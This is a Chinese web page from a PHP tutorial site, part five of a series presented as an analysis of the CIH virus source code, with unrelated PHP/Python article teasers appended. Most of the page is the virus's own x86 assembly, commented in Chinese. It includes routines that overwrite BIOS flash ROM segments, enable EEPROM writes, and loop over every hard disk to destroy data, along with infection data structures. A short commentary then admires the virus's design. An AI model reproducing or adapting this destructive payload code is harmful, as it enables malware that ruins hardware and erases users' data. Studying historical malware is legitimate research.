病毒程序源码实例剖析-CIH病毒[5]-php教程-PHP中文网

首页

后端开发

php教程

病毒程序源码实例剖析-CIH病毒[5]

黄舟

Jan 17, 2017 am 11:21 AM

病毒程序源码实例剖析-CIH病毒[5]

push ecx
　　loop $
　　
　　;破坏BIOS中额外的000E0000 - 000E007F段的 ROM数据，共80h个字节
　　xor ah, ah
　　mov [eax], al
　　
　　xchg ecx, eax
　　loop $
　　
　　; 显示和激活BIOS的000E0000 - 000FFFFF段数据，共128 KB，该段可写入信息mov eax, 0f5555h
　　pop ecx
　　mov ch, 0aah
　　call ebx
　　mov byte ptr [eax], 20h
　　
　　loop $
　　
　　; 破坏BIOS的000FE000 - 000FE07F段数据，共80h字节
　　mov ah, 0e0h
　　mov [eax], al
　　
　　; 隐藏BIOS的000F0000 - 000FFFFF段，共64 KB
　　mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
　　call esi
　　
　　; 破坏所有硬盘
　　KillHardDisk:
　　xor ebx, ebx
　　mov bh, FirstKillHardDiskNumber
　　push ebx
　　sub esp, 2ch
　　push 0c0001000h
　　mov bh, 08h
　　push ebx
　　push ecx
　　push ecx
　　push ecx
　　push 40000501h
　　inc ecx
　　push ecx
　　push ecx
　　
　　mov esi, esp
　　sub esp, 0ach
　　
　　;循环进行破坏
　　LoopOfKillHardDisk:
　　int 20h
　　dd 00100004h
　　
　　cmp word ptr [esi+06h], 0017h
　　je KillNextDataSection
　　
　　;换下一个硬盘
　　ChangeNextHardDisk:
　　inc byte ptr [esi+4dh]
　　
　　jmp LoopOfKillHardDisk
　　
　　;破坏下一个区域
　　KillNextDataSection:
　　add dword ptr [esi+10h], ebx
　　mov byte ptr [esi+4dh], FirstKillHardDiskNumber
　　
　　jmp LoopOfKillHardDisk
　　
　　;使EEPROM能够写入信息
　　EnableEEPROMToWrite:
　　mov [eax], cl
　　mov [ecx], al
　　mov byte ptr [eax], 80h
　　mov [eax], cl
　　mov [ecx], al
　　
　　ret
　　
　　IOForEEPROM:
　　@10 = IOForEEPROM
　　
　　xchg eax, edi
　　xchg edx, ebp
　　out dx, eax
　　
　　xchg eax, edi
　　xchg edx, ebp
　　in al, dx
　　
　　BooleanCalculateCode = $
　　or al, 44h
　　
　　xchg eax, edi
　　xchg edx, ebp
　　out dx, eax
　　
　　xchg eax, edi
　　xchg edx, ebp
　　out dx, al
　　
　　ret
　　
　　;静态数据定义
　　LastVxdCallAddress = IFSMgr_Ring0_FileIO ;最后一个调用的Vxd指令地址
　　VxdCallAddressTable db 00h
　　db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
　　db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
　　db IFSMgr_Ring0_FileIO-UniToBCSPath ;各个Vxd调用指令地址之差
　　
　　VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;Vxd的调用号
　　VxdCallTableSize = ($-VxdCallIDTable)/04h ;程序中使用Vxd调用的个数
　　
　　;病毒版本和版权信息定义
　　VirusVersionCopyright db 'CIH v' ;CIH病毒的标识
　　db MajorVirusVersion+'0' ;主版本号
　　db '.'
　　db MinorVirusVersion+'0' ;次版本号
　　db ' TATUNG' ;作者名字
　　
　　; 病毒大小
　　VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
　　 + NumberOfSections*SizeOfVirusCodeSectionTable(08h)
　　+ SizeOfTheFirstVirusCodeSectionTable(04h)
　　
　　;动态数据定义
　　VirusGameDataStartAddress = VirusSize
　　@6 = VirusGameDataStartAddress ;病毒数据起始地址
　　
　　OnBusy db 0 ;“忙”标志
　　FileModificationTime dd ? ;文件修改时间
　　
　　FileNameBuffer db FileNameBufferSize dup(?) ;7fh长的文件名缓冲区
　　@7 = FileNameBuffer
　　
　　DataBuffer = $
　　@8 = DataBuffer
　　NumberOfSections dw ? ; 块数目
　　TimeDateStamp dd ? ; 文件时间
　　SymbolsPointer dd ?
　　NumberOfSymbols dd ? ; 符号表中符号个数
　　SizeOfOptionalHeader dw ? ;可选文件头的长度
　　_Characteristics dw ? ;字符集标志
　　Magic dw ? ;标志字(总是010bh)
　　LinkerVersion dw ? ;连接器版本号
　　SizeOfCode dd ? ;代码段大小
　　SizeOfInitializedData dd ? ;已初始化数据块大小
　　SizeOfUninitializedData dd ? ;未初始化数据块大小
　　AddressOfEntryPoint dd ? ;程序起始RVA
　　BaseOfCode dd ? ;代码段起始RVA
　　BaseOfData dd ? ;数据段起始RVA
　　ImageBase dd ? ;装入基址RVA
　　
　　@9 = $
　　SectionAlignment dd ? ;块对齐
　　FileAlignment dd ? ;文件块对齐
　　OperatingSystemVersion dd ? ;所需操作系统版本号
　　ImageVersion dd ? ;用户自定义版本号
　　SubsystemVersion dd ? ;所需子系统版本号
　　Reserved dd ? ; 保留
　　SizeOfImage dd ? ; 文件各部分总长
　　SizeOfHeaders dd ? ;文件头大小
　　SizeOfImageHeaderToRead = $-NumberOfSections
　　NewAddressOfEntryPoint = DataBuffer
　　SizeOfImageHeaderToWrite = 04h
　　
　　StartOfSectionTable = @9
　　SectionName = StartOfSectionTable ;块名
　　VirtualSize = StartOfSectionTable+08h ;段真实长度
　　VirtualAddress = StartOfSectionTable+0ch ;块的RVA
　　SizeOfRawData = StartOfSectionTable+10h ; 块物理长度
　　PointerToRawData = StartOfSectionTable+14h ; 块物理偏移
　　PointerToRelocations = StartOfSectionTable+18h ; 重定位的偏移
　　PointerToLineNumbers = StartOfSectionTable+1ch ; 行号表的偏移
　　NumberOfRelocations = StartOfSectionTable+20h ; 重定位项数目
　　NumberOfLinenNmbers = StartOfSectionTable+22h ; 行号表的数目
　　Characteristics = StartOfSectionTable+24h ; 块属性
　　SizeOfScetionTable = Characteristics+04h-SectionName ; 每块表项的长度
　　
　　;病毒所需要的内存数量
　　VirusNeedBaseMemory = $
　　VirusNeedBaseMemory = $
　　
　　VirusTotalNeedMemory = @9
　　; + NumberOfSections(??)*SizeOfScetionTable(28h)
　　; + SizeOfVirusCodeSectionTableEndMark(04h)
　　; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
　　; + SizeOfTheFirstVirusCodeSectionTable(04h)
　　
　　;病毒程序结束
　　VirusGame ENDS
　　END FileHeader
　　从以上代码分析过程中，我们可以看出，CIH病毒结构清晰，层次分明。该病毒程序的主干结构与DOS病毒极其相似，只不过对病毒细节的处理都是按win95方法，全部系统调用都是采用Vxd。这样做使病毒程序更加底层、效率更高，也便于编程，与用Windows下的API函数相比，无须考虑病毒自身的复杂重定位过程；与使用中断相比，又更能防止对程序的跟踪分析。

　　CIH病毒有两个创新，一是病毒感染时查找感染对象文件的各块之间的空白区域,把病毒自己的各种数据结构和代码写到其中（如果空白区域不够就不传染，这就是为什么有些文件不会被感染的原因之一）；二是病毒发作时能破坏计算机硬件，不但要烧毁Flash Memory，还要毁坏硬盘。

　　出于安全的缘故，有关病毒发作、破坏硬件的这部分代码，我们没有给出详细的分析。

以上就是病毒程序源码实例剖析-CIH病毒[5]的内容，更多相关内容请关注PHP中文网（www.php.cn）！

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

PHP和Python：探索他们的相似性和差异Apr 19, 2025 am 12:21 AM

PHP和Python都是高层次的编程语言，广泛应用于Web开发、数据处理和自动化任务。1.PHP常用于构建动态网站和内容管理系统，而Python常用于构建Web框架和数据科学。2.PHP使用echo输出内容，Python使用print。3.两者都支持面向对象编程，但语法和关键字不同。4.PHP支持弱类型转换，Python则更严格。5.PHP性能优化包括使用OPcache和异步编程，Python则使用cProfile和异步编程。

PHP和Python：解释了不同的范例Apr 18, 2025 am 12:26 AM

PHP主要是过程式编程，但也支持面向对象编程（OOP）；Python支持多种范式，包括OOP、函数式和过程式编程。PHP适合web开发，Python适用于多种应用，如数据分析和机器学习。

PHP和Python：深入了解他们的历史Apr 18, 2025 am 12:25 AM

PHP起源于1994年，由RasmusLerdorf开发，最初用于跟踪网站访问者，逐渐演变为服务器端脚本语言，广泛应用于网页开发。Python由GuidovanRossum于1980年代末开发，1991年首次发布，强调代码可读性和简洁性，适用于科学计算、数据分析等领域。

在PHP和Python之间进行选择：指南Apr 18, 2025 am 12:24 AM

PHP适合网页开发和快速原型开发，Python适用于数据科学和机器学习。1.PHP用于动态网页开发，语法简单，适合快速开发。2.Python语法简洁，适用于多领域，库生态系统强大。

PHP和框架：现代化语言Apr 18, 2025 am 12:14 AM

PHP在现代化进程中仍然重要，因为它支持大量网站和应用，并通过框架适应开发需求。1.PHP7提升了性能并引入了新功能。2.现代框架如Laravel、Symfony和CodeIgniter简化开发，提高代码质量。3.性能优化和最佳实践进一步提升应用效率。

PHP的影响：网络开发及以后Apr 18, 2025 am 12:10 AM

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

PHP类型提示如何起作用，包括标量类型，返回类型，联合类型和无效类型？Apr 17, 2025 am 12:25 AM

PHP类型提示提升代码质量和可读性。1)标量类型提示：自PHP7.0起，允许在函数参数中指定基本数据类型，如int、float等。2)返回类型提示：确保函数返回值类型的一致性。3)联合类型提示：自PHP8.0起，允许在函数参数或返回值中指定多个类型。4)可空类型提示：允许包含null值，处理可能返回空值的函数。